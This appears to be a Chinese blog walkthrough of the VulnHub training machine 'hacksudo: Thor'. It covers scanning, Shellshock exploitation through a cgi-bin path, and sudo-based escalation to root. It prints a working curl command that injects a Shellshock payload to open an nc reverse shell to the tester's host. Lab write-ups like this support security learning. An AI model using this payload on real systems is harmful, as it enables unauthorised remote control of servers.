Vulnhub项目:HACKSUDO: THOR

1、靶机地址

hacksudo: Thor ~ VulnHubhacksudo: Thor, made by Vishal Waghmare. Download & walkthrough links are available.icon-default.png?t=N7T8https://vulnhub.com/entry/hacksudo-thor,733/

2、渗透过程

来了来了,开搞,先看目标 56.161,本机 56.160,nmap 一下

发现 21、22、80,访问一下 80 端口 

没啥东西,暂且没找到,那就扫一下目录看看。 

发现了有 readme,打开瞅瞅 

发现了用户名和密码,这怎么登陆,登不上!!!!那应该不是这的用户名和密码,上面扫目录还发现了 admin 登陆路径 

登陆看看 

登上了,好么,没啥好东西可以利用。 

在前面一番搜寻,终于在 news.php的源代码发现了 cgi-bin。 

这里会用到一个破壳漏洞 shellshock,下面是它的漏洞分析和原理 

Bash Shellshock漏洞复现及分析 - FreeBuf网络安全行业门户攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统。icon-default.png?t=N7T8https://www.freebuf.com/articles/system/279713.html

介绍下 cgi,看看他是干嘛的,怎么利用 

cgi是用来处理动态网页数据并通过HTTP进行交互,它允许web服务器直接执行服务器中类似控制台程序,需要指定一个目录,例如cgi-bin供cgi脚本能运行,当浏览器请求cgi目录中包含特定文件url时,服务器运行脚本,并输出传递回浏览器。

运行cgi脚本,回将特定信息复制到环境变量中,如果被调用,信息会传递给bash,成为一种恶意代码注入的方式。

shellshock破壳漏洞,是一个bashshell漏洞,系统的shell有严格的权限控制,如果没有相应的权限,无法执行相应的命令。


但是,Bash在运行的过程中会调用操作系统的环境变量,并且会执行一些设置命令。通过ShellShock漏洞,入侵者可以把某些”本来没有权限执行的语句或者命令“,注入到环境变量里。当bash设置环境变量的时候,就会执行这些”被注入“命令。这样子便绕过用户权限的限制,把一些”没有权限执行的命令“,变成”具有执行权限的命令“了。从而可以在系统内任意执行Bash命令语句,相当于获得root超级用户权限。

再扫一下,发现了确实有使用的痕迹 

curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.160 4444'" \http://192.168.56.161

输入 exp,反弹 shell 

 拿到 shell 之后,建立python交互式 shell

 进入 home,发现了 thor,但是进不去,那就提权一下,利用 sudo -l

 发现了一个 shell 脚本,可以看看是怎么用的输入 bash,进入 thor 用户 

然后获取用户的 flag 

 再 sudo -l 下,发现存在 service 的利用,cat 的利用,具体使用方法在一起文章中,有链接! 

利用 service 创建 sh,提权至root 

到 root 下发现了个锤子,雷神之锤! 

轻松愉快的完成此次渗透~~

3、思路总结

思路上没什么特别的,这个靶机主要是在于 shellshock 破壳漏洞的利用,对于该漏洞的原理以及使用方式得去学习。其他的都是常规操作,多做,多练,就有感觉了。

乘着马上要毕业了,最后这点休闲娱乐时光,快快的搞自己喜欢的东西~后续会继续更新!!!!

  • 9
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值